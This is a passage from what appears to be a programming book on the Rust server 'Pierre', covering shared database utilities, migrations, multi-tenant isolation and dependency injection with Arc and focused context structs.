├── mod.rs # Module exports (23 lines)
├── encryption.rs # AAD-based encryption utilities (201 lines)
├── transactions.rs # Retry patterns with backoff (162 lines)
├── enums.rs # Shared enum conversions (143 lines)
├── mappers.rs # Row -> struct conversion (192 lines)
├── validation.rs # Input validation (150 lines)
└── builders.rs # Query builder helpers (9 lines, deferred)
Benefits:
- DRY principle: No duplicate encryption/retry logic
- Consistency: Same behavior across SQLite and PostgreSQL
- Testability: Shared utilities tested once, work everywhere
- Maintainability: Bug fixes apply to all backends
- Code reduction: Eliminated 3,058 lines of wrapper boilerplate
Enum Conversions (enums.rs)
Source: src/database_plugins/shared/enums.rs:24-50
#![allow(unused)]
fn main() {
/// Convert UserTier enum to database string representation
#[must_use]
#[inline]
pub const fn user_tier_to_str(tier: &UserTier) -> &'static str {
match tier {
UserTier::Starter => tiers::STARTER,
UserTier::Professional => tiers::PROFESSIONAL,
UserTier::Enterprise => tiers::ENTERPRISE,
}
}
/// Convert database string to UserTier enum
/// Unknown values default to Starter tier for safety
#[must_use]
pub fn str_to_user_tier(s: &str) -> UserTier {
match s {
tiers::PROFESSIONAL | "pro" => UserTier::Professional,
tiers::ENTERPRISE => UserTier::Enterprise,
_ => UserTier::Starter,
}
}
}
Also includes:
- `user_status_to_str()` / `str_to_user_status()` - Active/Pending/Suspended
- `task_status_to_str()` / `str_to_task_status()` - Pending/Running/Completed/Failed/Cancelled
Why this matters: Both SQLite and PostgreSQL store enums as TEXT, requiring identical conversion logic. Sharing this eliminates duplicate code and ensures consistent enum handling.
Generic Row Parsing (mappers.rs)
Database-agnostic User parsing:
Source: src/database_plugins/shared/mappers.rs:37-74
#![allow(unused)]
fn main() {
/// Parse User from database row (works with PostgreSQL and SQLite)
pub fn parse_user_from_row<R>(row: &R) -> Result<User>
where
R: sqlx::Row,
for<'a> &'a str: sqlx::ColumnIndex<R>,
for<'a> usize: sqlx::ColumnIndex<R>,
Uuid: for<'a> sqlx::Type<R::Database> + for<'a> sqlx::Decode<'a, R::Database>,
String: for<'a> sqlx::Type<R::Database> + for<'a> sqlx::Decode<'a, R::Database>,
Option<String>: for<'a> sqlx::Type<R::Database> + for<'a> sqlx::Decode<'a, R::Database>,
// ... extensive trait bounds
{
// Parse enum fields using shared converters
let user_status_str: String = row.try_get("user_status")?;
let user_status = super::enums::str_to_user_status(&user_status_str);
let tier_str: String = row.try_get("tier")?;
let tier = super::enums::str_to_user_tier(&tier_str);
Ok(User {
id: row.try_get("id")?,
email: row.try_get("email")?,
display_name: row.try_get("display_name")?,
password_hash: row.try_get("password_hash")?,
tier,
tenant_id: row.try_get("tenant_id")?,
is_active: row.try_get("is_active")?,
user_status,
is_admin: row.try_get("is_admin").unwrap_or(false),
approved_by: row.try_get("approved_by")?,
approved_at: row.try_get("approved_at")?,
created_at: row.try_get("created_at")?,
last_active: row.try_get("last_active")?,
// OAuth tokens loaded separately
strava_token: None,
fitbit_token: None,
})
}
}
UUID handling across databases:
Source: src/database_plugins/shared/mappers.rs:177-192
#![allow(unused)]
fn main() {
/// Extract UUID from row (handles PostgreSQL UUID vs SQLite TEXT)
pub fn get_uuid_from_row<R>(row: &R, column: &str) -> Result<Uuid>
where
R: sqlx::Row,
for<'a> &'a str: sqlx::ColumnIndex<R>,
Uuid: for<'a> sqlx::Type<R::Database> + for<'a> sqlx::Decode<'a, R::Database>,
String: for<'a> sqlx::Type<R::Database> + for<'a> sqlx::Decode<'a, R::Database>,
{
// Try PostgreSQL UUID type first
if let Ok(uuid) = row.try_get::<Uuid, _>(column) {
return Ok(uuid);
}
// Fall back to SQLite TEXT (parse string)
let uuid_str: String = row.try_get(column)?;
Ok(Uuid::parse_str(&uuid_str)?)
}
}
Why this matters: PostgreSQL has native UUID support, SQLite stores UUIDs as TEXT. This helper abstracts the difference.
Also includes: parse_a2a_task_from_row<R>() for A2A task parsing with JSON deserialization.
Input Validation (validation.rs)
Email validation:
Source: src/database_plugins/shared/validation.rs:34-39
#![allow(unused)]
fn main() {
/// Validate email format
pub fn validate_email(email: &str) -> Result<()> {
if !email.contains('@') || email.len() < 3 {
return Err(AppError::invalid_input("Invalid email format").into());
}
Ok(())
}
}
Tenant ownership (authorization):
Source: src/database_plugins/shared/validation.rs:63-75
#![allow(unused)]
fn main() {
/// Validate that entity belongs to specified tenant
pub fn validate_tenant_ownership(
entity_tenant_id: &str,
expected_tenant_id: &str,
entity_type: &str,
) -> Result<()> {
if entity_tenant_id != expected_tenant_id {
return Err(AppError::auth_invalid(format!(
"{entity_type} does not belong to the specified tenant"
))
.into());
}
Ok(())
}
}
Expiration checks (OAuth tokens, sessions):
Source: src/database_plugins/shared/validation.rs:104-113
#![allow(unused)]
fn main() {
/// Validate expiration timestamp
pub fn validate_not_expired(
expires_at: DateTime<Utc>,
now: DateTime<Utc>,
entity_type: &str,
) -> Result<()> {
if expires_at <= now {
return Err(AppError::invalid_input(format!("{entity_type} has expired")).into());
}
Ok(())
}
}
Scope authorization (OAuth2, A2A):
Source: src/database_plugins/shared/validation.rs:140-150
#![allow(unused)]
fn main() {
/// Validate scope authorization
pub fn validate_scope_granted(
requested_scopes: &[String],
granted_scopes: &[String],
) -> Result<()> {
for scope in requested_scopes {
if !granted_scopes.contains(scope) {
return Err(AppError::auth_invalid(format!("Scope '{scope}' not granted")).into());
}
}
Ok(())
}
}
Why this matters: Multi-tenant authorization and OAuth validation logic is identical across backends. Centralizing prevents divergence.
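The scope check above is a plain subset test and can be exercised directly. This sketch uses a `String` error instead of `AppError`, and the scope names are illustrative:

```rust
/// Every requested scope must appear in the granted set, or the whole
/// request is rejected (fail-closed).
fn validate_scope_granted(requested: &[String], granted: &[String]) -> Result<(), String> {
    for scope in requested {
        if !granted.contains(scope) {
            return Err(format!("Scope '{scope}' not granted"));
        }
    }
    Ok(())
}

fn main() {
    let granted = vec!["activities:read".to_string(), "profile:read".to_string()];

    // A subset of granted scopes passes.
    assert!(validate_scope_granted(&["activities:read".to_string()], &granted).is_ok());

    // One missing scope rejects the entire request, naming the offender.
    let err = validate_scope_granted(
        &["activities:read".to_string(), "activities:write".to_string()],
        &granted,
    );
    assert_eq!(err, Err("Scope 'activities:write' not granted".to_string()));
}
```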
HasEncryption Trait
Both database backends implement this shared encryption interface:
Source: src/database_plugins/shared/encryption.rs:129-137
#![allow(unused)]
fn main() {
/// Trait for database encryption operations
pub trait HasEncryption {
/// Encrypt data with Additional Authenticated Data (AAD) context
fn encrypt_data_with_aad(&self, data: &str, aad: &str) -> Result<String>;
/// Decrypt data with AAD context verification
fn decrypt_data_with_aad(&self, encrypted: &str, aad: &str) -> Result<String>;
}
}
Why this matters: Allows shared encryption utilities to work with both SQLite and PostgreSQL implementations through trait bounds.
Rust Idioms: Repository Pattern
Pattern: Focused, cohesive interfaces
#![allow(unused)]
fn main() {
// Database provides accessors
impl Database {
pub fn users(&self) -> UserRepositoryImpl { ... }
pub fn oauth_tokens(&self) -> OAuthTokenRepositoryImpl { ... }
}
// Usage
let user = db.users().get_by_id(user_id).await?;
let token = db.oauth_tokens().get(user_id, tenant_id, provider).await?;
}
Why this works:
- Single Responsibility: Each repository handles one domain
- Interface Segregation: Consumers only depend on what they need
- Testability: Can mock individual repositories
- Clarity: `db.users().create()` is clearer than `db.create_user()`
Rust Idioms: Conditional Compilation
Pattern: Feature-gated code with clear error messages
#![allow(unused)]
fn main() {
#[cfg(feature = "postgresql")]
PostgreSQL(PostgresDatabase),
#[cfg(not(feature = "postgresql"))]
DatabaseType::PostgreSQL => {
Err(AppError::config(
"PostgreSQL support not enabled. Enable the 'postgresql' feature flag."
).into())
}
}
Benefits:
- Binary size: SQLite-only builds exclude PostgreSQL dependencies
- Compilation speed: Only compile enabled backends
- Clear errors: Helpful messages when feature missing
Connection Pooling (PostgreSQL)
PostgreSQL implementation uses connection pooling for performance:
Configuration (src/config/environment.rs - conceptual):
#![allow(unused)]
fn main() {
pub struct PostgresPoolConfig {
pub max_connections: u32, // Default: 10
pub min_connections: u32, // Default: 2
pub acquire_timeout_secs: u64, // Default: 30
pub idle_timeout_secs: Option<u64>, // Default: 600 (10 min)
pub max_lifetime_secs: Option<u64>, // Default: 1800 (30 min)
}
}
Pool creation:
#![allow(unused)]
fn main() {
let pool = PgPoolOptions::new()
.max_connections(config.max_connections)
.min_connections(config.min_connections)
.acquire_timeout(Duration::from_secs(config.acquire_timeout_secs))
.idle_timeout(config.idle_timeout_secs.map(Duration::from_secs))
.max_lifetime(config.max_lifetime_secs.map(Duration::from_secs))
.connect(&database_url)
.await?;
}
Why pooling:
- Performance: Reuse connections, avoid handshake overhead
- Concurrency: Handle multiple simultaneous requests
- Resource limits: Cap max connections to database
- Health: Recycle connections after max lifetime
Migration System
Pierre uses SQLx migrations for schema management. See migrations/README.md for comprehensive documentation.
20 migration files covering 40+ tables:
| Migration | Tables/Changes |
|---|---|
| 20250120000001_users_schema.sql | users, user_profiles, user_oauth_app_credentials |
| 20250120000002_api_keys_schema.sql | api_keys, api_key_usage |
| 20250120000003_analytics_schema.sql | jwt_usage, goals, insights, request_logs |
| 20250120000004_a2a_schema.sql | a2a_clients, a2a_sessions, a2a_tasks, a2a_usage |
| 20250120000005_admin_schema.sql | admin_tokens, admin_token_usage, admin_provisioned_keys, system_secrets, rsa_keypairs |
| 20250120000006_oauth_tokens_schema.sql | user_oauth_tokens |
| 20250120000007_oauth_notifications_schema.sql | oauth_notifications |
| 20250120000008_oauth2_schema.sql | oauth2_clients, oauth2_auth_codes, oauth2_refresh_tokens, oauth2_states |
| 20250120000009_tenant_management_schema.sql | tenants, tenant_oauth_credentials, oauth_apps, key_versions, audit_events, tenant_users |
| 20250120000010_fitness_configurations_schema.sql | fitness_configurations |
| 20250120000011_expand_oauth_provider_constraints.sql | Adds garmin, whoop, terra to provider CHECK constraints |
| 20250120000012_user_roles_permissions.sql | impersonation_sessions, permission_delegations, user_mcp_tokens; adds role column to users |
| 20250120000013_system_settings_schema.sql | system_settings |
| 20250120000014_add_missing_foreign_keys.sql | Adds FK constraints to a2a_clients.user_id, user_configurations.user_id |
| 20250120000015_remove_legacy_user_token_columns.sql | Removes legacy OAuth columns from users; adds last_sync to user_oauth_tokens |
| 20250120000017_chat_schema.sql | chat_conversations, chat_messages |
| 20250120000018_firebase_auth.sql | Adds firebase_uid, auth_provider columns to users |
| 20250120000019_recipes_schema.sql | recipes, recipe_ingredients |
| 20250120000020_admin_config_schema.sql | admin_config_overrides, admin_config_audit, admin_config_categories |
| 20250120000021_add_config_categories.sql | Adds provider, cache, MCP, monitoring categories |
Example schema (migrations/20250120000006_oauth_tokens_schema.sql):
CREATE TABLE IF NOT EXISTS user_oauth_tokens (
id TEXT PRIMARY KEY,
user_id TEXT NOT NULL,
tenant_id TEXT NOT NULL,
provider TEXT NOT NULL,
access_token TEXT NOT NULL, -- Encrypted with AAD
refresh_token TEXT, -- Encrypted with AAD
token_type TEXT NOT NULL DEFAULT 'bearer',
expires_at TEXT,
scope TEXT,
created_at TEXT NOT NULL,
updated_at TEXT NOT NULL,
UNIQUE(user_id, tenant_id, provider)
);
Cross-database compatibility:
- All types use TEXT (portable across SQLite and PostgreSQL)
- Timestamps stored as ISO8601 strings (app-generated)
- UUIDs stored as TEXT (app-generated)
- Booleans stored as INTEGER (0/1)
Migration execution:
#![allow(unused)]
fn main() {
async fn migrate(&self) -> Result<()> {
sqlx::migrate!("./migrations")
.run(&self.pool)
.await?;
Ok(())
}
}
Migration benefits:
- Version control: Migrations tracked in git
- Reproducibility: Same schema on dev/staging/prod
- Rollback: Down migrations for reverting changes
- Type safety: SQLx compile-time query verification
Multi-Tenant Data Isolation
Database schema enforces tenant isolation:
Composite primary keys:
CREATE TABLE user_oauth_tokens (
user_id UUID NOT NULL,
tenant_id TEXT NOT NULL, -- Part of primary key
provider TEXT NOT NULL,
-- ...
PRIMARY KEY (user_id, tenant_id, provider)
);
Queries always include tenant_id:
#![allow(unused)]
fn main() {
db.oauth_tokens()
.get(user_id, tenant_id, provider)
.await?;
}
AAD encryption binding: Tenant ID in AAD prevents cross-tenant token copying at encryption layer.
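A sketch of how such a binding works: the AAD is derived from the tenant, user, and provider, so a ciphertext copied to another tenant fails AES-GCM's authentication check on decrypt. The `tenant:user:provider` layout below is an assumption for illustration, not Pierre's actual AAD format:

```rust
/// Build the additional authenticated data (AAD) for a stored token.
/// The "tenant:user:provider" layout is illustrative only.
fn build_aad(tenant_id: &str, user_id: &str, provider: &str) -> Vec<u8> {
    format!("{tenant_id}:{user_id}:{provider}").into_bytes()
}

fn main() {
    let aad_a = build_aad("tenant-a", "user-1", "strava");
    let aad_b = build_aad("tenant-b", "user-1", "strava");
    // Different tenants produce different AAD, so decrypting a ciphertext
    // copied across tenants fails its authentication check.
    assert_ne!(aad_a, aad_b);
}
```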
Key Takeaways
- Repository pattern: 13 focused traits replaced a 135-method god-trait (commit 6f3efef).
- Accessor methods: db.users(), db.oauth_tokens(), etc. provide clear, focused interfaces.
- SOLID principles: Single Responsibility and Interface Segregation enforced.
- Factory pattern: Automatic database type detection from the connection string.
- Feature flags: Conditional compilation for database backends.
- AAD encryption: OAuth tokens encrypted with tenant/user/provider binding via the HasEncryption trait.
- Transaction retry: Exponential backoff for deadlock/timeout errors (10ms to 160ms).
- Shared utilities: 880 lines across 6 modules eliminated 3,058 lines of wrapper boilerplate:
  - enums.rs: UserTier, UserStatus, TaskStatus conversions
  - mappers.rs: Generic row parsing with complex trait bounds
  - validation.rs: Email, tenant ownership, expiration, scope checks
  - encryption.rs: AAD-based encryption utilities
  - transactions.rs: Retry patterns with exponential backoff
  - builders.rs: Deferred to a later phase (minimal implementation)
- Connection pooling: PostgreSQL uses pooling for performance and concurrency.
- Migration system: SQLx migrations for version-controlled schema changes.
- Multi-tenant isolation: Composite keys and AAD binding enforce tenant boundaries.
- Instrumentation: Tracing macros add database operation context to logs.
- Error handling: Clear messages when feature flags are missing or URLs are invalid.
- Code reduction: The refactoring deleted the entire 3,058-line sqlite.rs wrapper file.
Related Chapters:
- Chapter 2: Error Handling (DatabaseError types)
- Chapter 5: Cryptographic Keys (encryption key management)
- Chapter 7: Multi-Tenant Isolation (application-layer tenant context)
- Chapter 23: Testing Framework (database testing patterns)
Chapter 4: Dependency Injection with Context Pattern
Introduction
Rust’s ownership system makes dependency injection (DI) different from languages with garbage collection. You can’t just pass references everywhere - you need to think about lifetimes and ownership.
Pierre uses Arc<T> to share expensive resources (database pools, auth managers, caches) across handlers and threads.
Key concepts:
- Dependency Injection: Providing dependencies to a struct rather than creating them internally
- Arc<T>: Thread-safe reference-counted smart pointer
- Service Locator: Anti-pattern where a single struct holds all dependencies
- Focused Contexts: Better pattern with separate contexts for different domains
The Problem: Expensive Resource Creation
Consider what happens without dependency injection:
#![allow(unused)]
fn main() {
// ANTI-PATTERN: Creating expensive resources repeatedly
async fn handle_request(user_id: &str) -> Result<Response> {
// Creates new database connection (expensive!)
let database = Database::new(&config.database_url).await?;
// Creates new auth manager (unnecessary!)
let auth_manager = AuthManager::new(24);
// Use them...
let user = database.get_user(user_id).await?;
let token = auth_manager.create_token(&user)?;
Ok(response)
}
}
Problems:
- Performance: Database connection pool created per request
- Resource exhaustion: Each connection uses memory/file descriptors
- Configuration duplication: Same config loaded repeatedly
- No sharing: Can’t share state (caches, metrics) between requests
Solution 1: Dependency Injection with Arc<T>
Arc (Atomic Reference Counting) enables shared ownership across threads.
Arc Basics
#![allow(unused)]
fn main() {
use std::sync::Arc;
// Create an expensive resource once
let database = Arc::new(Database::new(&config).await?);
// Clone the Arc (cheap - just increments counter)
let db_clone = Arc::clone(&database); // Or database.clone()
// Both point to the same underlying Database
// When last Arc is dropped, Database is dropped
}
Rust Idioms Explained:
- Arc::new(value) - Wrap a value in an atomic reference counter
  - Allocates on the heap
  - Returns Arc<T>
  - Thread-safe (uses atomic operations)
- Arc::clone(&arc) vs .clone() - Both do the same thing (increment the counter)
  - Arc::clone makes it explicit (recommended in the docs)
  - .clone() is shorter (common in Pierre)
- Drop semantics
  - Each Arc::clone() increments the counter
  - Each drop decrements the counter
  - When the counter reaches 0, the inner value is dropped
- Cost
  - Creating an Arc: one heap allocation
  - Cloning an Arc: increment an atomic counter (~1-2 CPU instructions)
  - Accessing data: no overhead (just a deref)
Reference: Rust Book - Arc
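These counter semantics are directly observable with `Arc::strong_count`; a small self-contained check:

```rust
use std::sync::Arc;

/// Returns the strong counts (initial, after clone, after drop).
fn arc_count_demo() -> (usize, usize, usize) {
    let data = Arc::new(vec![1, 2, 3]);
    let initial = Arc::strong_count(&data);
    let clone = Arc::clone(&data); // increments the atomic counter
    let after_clone = Arc::strong_count(&data);
    drop(clone); // decrements the counter
    let after_drop = Arc::strong_count(&data);
    (initial, after_clone, after_drop)
}

fn main() {
    assert_eq!(arc_count_demo(), (1, 2, 1));
}
```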
Dependency Injection Example
use std::sync::Arc;
// 1. Create expensive resources once at startup
#[tokio::main]
async fn main() -> Result<()> {
let database = Arc::new(Database::new(&config).await?);
let auth_manager = Arc::new(AuthManager::new(24));
// 2. Pass to HTTP handlers via Axum state
let app = Router::new()
.route("/users/:id", get(get_user_handler))
.with_state(AppState { database, auth_manager });
// 3. Listen for requests
axum::Server::bind(&addr).serve(app.into_make_service()).await?;
Ok(())
}
// Handler receives dependencies via State extractor
async fn get_user_handler(
State(state): State<AppState>,
Path(user_id): Path<String>,
) -> Result<Json<User>, AppError> {
// database and auth_manager are Arc clones (cheap)
let user = state.database.get_user(&user_id).await?;
let token = state.auth_manager.create_token(&user)?;
Ok(Json(user))
}
#[derive(Clone)]
struct AppState {
database: Arc<Database>,
auth_manager: Arc<AuthManager>,
}
Pattern:
- Create once → Wrap in Arc → Share via cloning Arc
Reference: Axum - Sharing State
ServerResources: Centralized Dependency Container
Pierre uses ServerResources as a central container for all dependencies.
Source: src/mcp/resources.rs:35-77
#![allow(unused)]
fn main() {
/// Centralized resource container for dependency injection
#[derive(Clone)]
pub struct ServerResources {
/// Database connection pool for persistent storage operations
pub database: Arc<Database>,
/// Authentication manager for user identity verification
pub auth_manager: Arc<AuthManager>,
/// JSON Web Key Set manager for RS256 JWT signing and verification
pub jwks_manager: Arc<JwksManager>,
/// Authentication middleware for MCP request validation
pub auth_middleware: Arc<McpAuthMiddleware>,
/// WebSocket connection manager for real-time updates
pub websocket_manager: Arc<WebSocketManager>,
/// Server-Sent Events manager for streaming notifications
pub sse_manager: Arc<crate::sse::SseManager>,
/// OAuth client for multi-tenant authentication flows
pub tenant_oauth_client: Arc<TenantOAuthClient>,
/// Registry of fitness data providers (Strava, Fitbit, Garmin, WHOOP, Terra)
pub provider_registry: Arc<ProviderRegistry>,
/// Secret key for admin JWT token generation
pub admin_jwt_secret: Arc<str>,
/// Server configuration loaded from environment
pub config: Arc<crate::config::environment::ServerConfig>,
/// AI-powered fitness activity analysis engine
pub activity_intelligence: Arc<ActivityIntelligence>,
/// A2A protocol client manager
pub a2a_client_manager: Arc<A2AClientManager>,
/// Service for managing A2A system user accounts
pub a2a_system_user_service: Arc<A2ASystemUserService>,
/// Broadcast channel for OAuth completion notifications
pub oauth_notification_sender: Option<broadcast::Sender<OAuthCompletedNotification>>,
/// Cache layer for performance optimization
pub cache: Arc<Cache>,
/// Optional plugin executor for custom tool implementations
pub plugin_executor: Option<Arc<PluginToolExecutor>>,
/// Configuration for PII redaction in logs and responses
pub redaction_config: Arc<RedactionConfig>,
/// Rate limiter for OAuth2 endpoints
pub oauth2_rate_limiter: Arc<crate::oauth2_server::rate_limiting::OAuth2RateLimiter>,
}
}
Rust Idioms Explained:
- #[derive(Clone)] on a struct with Arc fields
  - Cloning ServerResources clones all the Arcs (cheap)
  - Does NOT clone the underlying data (Database, AuthManager, etc.)
  - Enables passing resources around without lifetime parameters
- Arc<str> for string secrets
  - More memory efficient than Arc<String>
  - Immutable (strings never change)
  - Implements AsRef<str> for easy access
- Option<Arc<T>> for optional dependencies
  - plugin_executor may not be initialized
  - None means the feature is disabled
  - Some(Arc<...>) when enabled
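The `Option<Arc<T>>` idiom typically pairs with `as_ref()` at the call site, so a handler can fall back to a built-in path when the feature is disabled. A minimal sketch with simplified stand-ins for Pierre's types:

```rust
use std::sync::Arc;

// Hypothetical stand-in for Pierre's plugin executor type.
struct PluginToolExecutor;

impl PluginToolExecutor {
    fn execute(&self, tool: &str) -> String {
        format!("plugin handled {tool}")
    }
}

struct Resources {
    plugin_executor: Option<Arc<PluginToolExecutor>>,
}

/// Delegate to the plugin system when enabled, otherwise use the built-in path.
fn dispatch(resources: &Resources, tool: &str) -> String {
    match resources.plugin_executor.as_ref() {
        Some(executor) => executor.execute(tool),
        None => format!("built-in handled {tool}"),
    }
}

fn main() {
    let disabled = Resources { plugin_executor: None };
    let enabled = Resources { plugin_executor: Some(Arc::new(PluginToolExecutor)) };
    assert_eq!(dispatch(&disabled, "get_activities"), "built-in handled get_activities");
    assert_eq!(dispatch(&enabled, "get_activities"), "plugin handled get_activities");
}
```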
Creating ServerResources
Source: src/mcp/resources.rs:85-150
#![allow(unused)]
fn main() {
impl ServerResources {
pub fn new(
database: Database,
auth_manager: AuthManager,
admin_jwt_secret: &str,
config: Arc<crate::config::environment::ServerConfig>,
cache: Cache,
rsa_key_size_bits: usize,
jwks_manager: Option<Arc<JwksManager>>,
) -> Self {
// Wrap expensive resources in Arc once
let database_arc = Arc::new(database);
let auth_manager_arc = Arc::new(auth_manager);
// Create dependent resources
let tenant_oauth_client = Arc::new(TenantOAuthClient::new(
TenantOAuthManager::new(Arc::new(config.oauth.clone()))
));
let provider_registry = Arc::new(ProviderRegistry::new());
// Create intelligence engine
let activity_intelligence = Self::create_default_intelligence();
// Create A2A components
let a2a_system_user_service = Arc::new(
A2ASystemUserService::new(database_arc.clone())
);
let a2a_client_manager = Arc::new(A2AClientManager::new(
database_arc.clone(),
a2a_system_user_service.clone(),
));
// Wrap cache
let cache_arc = Arc::new(cache);
// Load or create JWKS manager
let jwks_manager_arc = jwks_manager.unwrap_or_else(|| {
// Load from database or create new
// ... (initialization logic)
Arc::new(new_jwks)
});
Self {
database: database_arc,
auth_manager: auth_manager_arc,
jwks_manager: jwks_manager_arc,
tenant_oauth_client,
provider_registry,
// ... all other fields
}
}
}
}
Pattern observations:
- Accept owned values (database: Database)
  - Not Arc<Database> in the parameters
  - The caller doesn't need to know about Arc
  - new() wraps in Arc internally
- Return Self (not Arc<Self>)
  - The caller decides if they need an Arc
  - Typical usage: Arc::new(ServerResources::new(...))
- .clone() on an Arc is explicit
  - Shows resource sharing happening
  - Comments explain why (see line 9 note about "Safe" clones)
Using ServerResources
Source: src/bin/pierre-mcp-server.rs:182-220
#![allow(unused)]
fn main() {
fn create_server(
database: Database,
auth_manager: AuthManager,
jwt_secret: &str,
config: &ServerConfig,
cache: Cache,
) -> MultiTenantMcpServer {
let rsa_key_size = get_rsa_key_size();
// Create resources (wraps everything in Arc)
let mut resources_instance = ServerResources::new(
database,
auth_manager,
jwt_secret,
Arc::new(config.clone()),
cache,
rsa_key_size,
None, // Generate new JWKS
);
// Wrap in Arc for sharing
let resources_arc = Arc::new(resources_instance.clone());
// Initialize plugin system (needs Arc<ServerResources>)
let plugin_executor = PluginToolExecutor::new(resources_arc);
// Set plugin executor back on resources
resources_instance.set_plugin_executor(Arc::new(plugin_executor));
// Final Arc wrapping
let resources = Arc::new(resources_instance);
// Create server with resources
MultiTenantMcpServer::new(resources)
}
}
Pattern: Create → Arc wrap → Share → Modify → Re-wrap
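This two-phase shape can be reproduced in miniature. Note the subtlety: the temporary Arc holds a snapshot taken before the plugin was set, which is why the code re-wraps the modified instance at the end. The types here are simplified stand-ins, not Pierre's real ones:

```rust
use std::sync::Arc;

#[derive(Clone)]
struct Resources {
    name: Arc<str>,
    plugin: Option<Arc<String>>,
}

fn build() -> Arc<Resources> {
    // Create ...
    let mut instance = Resources { name: Arc::from("pierre"), plugin: None };
    // Arc wrap → Share: the plugin gets a handle to a pre-plugin snapshot
    let snapshot = Arc::new(instance.clone());
    let plugin = Arc::new(format!("plugin bound to {}", snapshot.name));
    // Modify → Re-wrap: the final Arc carries the plugin
    instance.plugin = Some(plugin);
    Arc::new(instance)
}

fn main() {
    let resources = build();
    assert!(resources.plugin.is_some());
}
```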
The Service Locator Anti-Pattern
While ServerResources works, it’s a service locator anti-pattern.
Problems with service locator:
- God object - A single struct knows about everything
- Hidden dependencies - Functions take ServerResources but only use 1-2 fields
- Testing complexity - Must mock the entire ServerResources even for simple tests
- Tight coupling - Adding a new dependency requires changing one big struct
- Unclear requirements - Can't tell from a signature what a function needs
Example of the problem:
#![allow(unused)]
fn main() {
// What does this function actually need?
async fn process_activity(
resources: &ServerResources,
activity_id: &str,
) -> Result<ProcessedActivity> {
// Uses only database and intelligence
let activity = resources.database.get_activity(activity_id).await?;
let analysis = resources.activity_intelligence.analyze(&activity)?;
Ok(analysis)
}
// Better: explicit dependencies
async fn process_activity(
database: &Database,
intelligence: &ActivityIntelligence,
activity_id: &str,
) -> Result<ProcessedActivity> {
// Clear what's needed!
let activity = database.get_activity(activity_id).await?;
let analysis = intelligence.analyze(&activity)?;
Ok(analysis)
}
}
Reference: Service Locator Anti-Pattern
Solution 2: Focused Context Pattern
Pierre is evolving toward focused contexts that group related dependencies.
Source: src/context/mod.rs:1-40
#![allow(unused)]
fn main() {
//! Focused dependency injection contexts
//!
//! This module replaces the `ServerResources` service locator anti-pattern with
//! focused contexts that provide only the dependencies needed for specific operations.
//!
//! # Architecture
//!
//! - `AuthContext`: Authentication and authorization dependencies
//! - `DataContext`: Database and data provider dependencies
//! - `ConfigContext`: Configuration and OAuth management dependencies
//! - `NotificationContext`: WebSocket and SSE notification dependencies
/// Authentication context
pub mod auth;
/// Configuration context
pub mod config;
/// Data context
pub mod data;
/// Notification context
pub mod notification;
/// Server context combining all focused contexts
pub mod server;
// Re-exports
pub use auth::AuthContext;
pub use config::ConfigContext;
pub use data::DataContext;
pub use notification::NotificationContext;
pub use server::ServerContext;
}
Focused Context Example
#![allow(unused)]
fn main() {
// Conceptual example of focused contexts
/// Context for authentication operations
#[derive(Clone)]
pub struct AuthContext {
pub auth_manager: Arc<AuthManager>,
pub jwks_manager: Arc<JwksManager>,
pub middleware: Arc<McpAuthMiddleware>,
}
/// Context for data operations
#[derive(Clone)]
pub struct DataContext {
pub database: Arc<Database>,
pub provider_registry: Arc<ProviderRegistry>,
pub cache: Arc<Cache>,
}
/// Context for configuration operations
#[derive(Clone)]
pub struct ConfigContext {
pub config: Arc<ServerConfig>,
pub tenant_oauth_client: Arc<TenantOAuthClient>,
}
// Use specific contexts
async fn authenticate_user(
auth_ctx: &AuthContext,
token: &str,
) -> Result<User> {
// Only has access to auth-related dependencies
auth_ctx.auth_manager.validate_token(token)
}
async fn fetch_activities(
data_ctx: &DataContext,
user_id: &str,
) -> Result<Vec<Activity>> {
// Only has access to data-related dependencies
data_ctx.database.get_activities(user_id).await
}
}
Benefits:
- ✅ Clear dependencies - Function signature shows what it needs
- ✅ Easier testing - Mock only relevant context
- ✅ Better organization - Related dependencies grouped
- ✅ Loose coupling - Changes to one context don’t affect others
- ✅ Type safety - Compiler prevents using wrong context
Arc<T> vs Rc<T> vs Box<T>
Understanding when to use each smart pointer:
| Type | Thread-Safe? | Overhead | Use When |
|---|---|---|---|
| Box<T> | N/A | Single allocation | Single ownership, heap allocation |
| Rc<T> | ❌ No | Non-atomic counter | Shared ownership, single thread |
| Arc<T> | ✅ Yes | Atomic counter | Shared ownership, multi-threaded |
Pierre uses Arc<T> because:
- Axum handlers run on different threads
- Need to share resources across concurrent requests
- Thread safety is non-negotiable in async runtime
When to use each:
#![allow(unused)]
fn main() {
// Box<T> - Single ownership
let config = Box::new(Config::from_file("config.toml")?);
drop(config); // Config is dropped
// Rc<T> - Shared ownership, single thread
use std::rc::Rc;
let data = Rc::new(vec![1, 2, 3]);
let data2 = Rc::clone(&data);
// Both point to same Vec, single-threaded only
// Arc<T> - Shared ownership, multi-threaded
use std::sync::Arc;
let database = Arc::new(Database::new()?);
tokio::spawn(async move {
database.query(...).await // Can use in another thread
});
}
Reference: Rust Book - Smart Pointers
Interior Mutability with Arc<Mutex<T>>
Arc provides shared ownership, but data is immutable. For mutable shared state, use Mutex.
#![allow(unused)]
fn main() {
use std::sync::{Arc, Mutex};
// Shared mutable counter
let counter = Arc::new(Mutex::new(0));
// Spawn multiple tasks that increment counter
for _ in 0..10 {
let counter_clone = Arc::clone(&counter);
tokio::spawn(async move {
let mut num = counter_clone.lock().unwrap(); // Acquire lock
*num += 1;
}); // Lock automatically released when `num` is dropped
}
}
Rust Idioms Explained:
- Arc<Mutex<T>> pattern
  - Arc for shared ownership
  - Mutex for exclusive access
  - Common pattern for shared mutable state
- .lock() returns MutexGuard
  - RAII guard that unlocks on drop
  - Implements Deref and DerefMut
  - Access the inner value with *guard
- When to use:
  - ✅ Occasional writes (metrics, caches)
  - ❌ Frequent writes (use channels/actors instead)
  - ❌ Async code (use tokio::sync::Mutex instead)
Pierre examples:
- WebSocketManager uses DashMap (a concurrent HashMap)
- Cache uses Mutex for LRU eviction
- Most resources are immutable after creation
Reference: Rust Book - Mutex
Diagram: Dependency Injection Flow
┌──────────────────────────────────────────────────────────┐
│ Application Startup │
└──────────────────────────────────────────────────────────┘
│
▼
┌─────────────────────────────────────┐
│ Create Expensive Resources Once │
│ - Database (connection pool) │
│ - AuthManager (key material) │
│ - JwksManager (RSA keys) │
│ - Cache (LRU storage) │
└─────────────────┬───────────────────┘
│
▼
┌─────────────────────────────────────┐
│ Wrap in Arc<T> │
│ - Arc::new(database) │
│ - Arc::new(auth_manager) │
│ - Arc::new(jwks_manager) │
└─────────────────┬───────────────────┘
│
▼
┌─────────────────────────────────────┐
